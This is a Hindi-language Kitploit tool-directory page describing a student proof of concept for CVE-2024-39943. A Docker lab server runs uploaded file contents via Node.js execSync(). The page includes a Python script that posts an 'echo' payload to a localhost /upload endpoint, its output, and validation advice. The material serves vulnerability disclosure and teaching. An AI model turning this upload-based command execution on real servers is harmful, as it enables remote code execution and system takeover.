Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Node.js-CVE-2024-39943 — सीवीई-2024-39943 के लिए साक्ष्य-अवधारणा शोषण, Node.js HFS सर्वर में child_process.execSync() का उपयोग करके फ़ाइल अपलोड के माध्यम से दूरस्थ कोड निष्पादन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/jenmrr/node.js-cve-2024-39943
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubjenmrr/node.js-cve-2024-39943

Node.js-CVE-2024-39943

सीवीई-2024-39943 के लिए साक्ष्य-अवधारणा शोषण, Node.js HFS सर्वर में child_process.execSync() का उपयोग करके फ़ाइल अपलोड के माध्यम से दूरस्थ कोड निष्पादन का प्रदर्शन करता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Node.js HFS कमांड निष्पादन भेद्यता (CVE-2024-39943)

व्हाइटहैट स्कूल तीसरी बैच – नो जंग-मिन (@JenmrR)


सारांश

Node.js-आधारित HFS सर्वर वातावरण में, अपलोड की गई फ़ाइल की सामग्री को child_process.execSync() पर निष्पादित करने वाली एक भेद्यता मौजूद है।
हमलावर फ़ाइल अपलोड सुविधा के माध्यम से OS कमांड को सीधे निष्पादित कर सकता है, और सर्वर के आंतरिक कमांड परिणाम देख सकता है या सिस्टम को नियंत्रित कर सकता है।
यह CVE-2024-39943 के अनुरूप एक भेद्यता है, जो कमांड इंजेक्शन (रिमोट कोड निष्पादन) के समान खतरा पैदा करती है।


पर्यावरण कॉन्फ़िगरेशन और निष्पादन

  1. Docker वातावरण के माध्यम से सर्वर चलाएं
  2. सर्वर /upload पथ पर फ़ाइल अपलोड प्राप्त करता है और अपलोड की गई फ़ाइल की सामग्री को कमांड के रूप में निष्पादित करता है
  3. हमलावर अपलोड के माध्यम से RCE प्राप्त कर सकता है

निष्पादन प्रवाह

root@kitploit:~
$ sudo docker-compose up --build -d
root@kitploit:~
$ python3 poc.py

poc.py

root@kitploit:~
import requests

payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }

r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)

परिणाम

PoC निष्पादन के बाद सर्वर प्रतिक्रिया:

root@kitploit:~
Executed:
Hello_From_Hacked_Server

poc-result


निष्कर्ष

  • यह भेद्यता एक विशिष्ट RCE (रिमोट कमांड निष्पादन) भेद्यता है जो तब होती है जब बाहरी इनपुट को OS कमांड के रूप में निष्पादित किया जाता है।
  • अपलोड की गई फ़ाइल सामग्री को सीधे execSync() के माध्यम से निष्पादित करने का तरीका गंभीर सुरक्षा जोखिम पैदा करता है।
  • उपयोगकर्ता इनपुट को हमेशा मान्य किया जाना चाहिए और इसे सर्वर के भीतर सीधे निष्पादित नहीं किया जाना चाहिए।
टूल डाउनलोड करें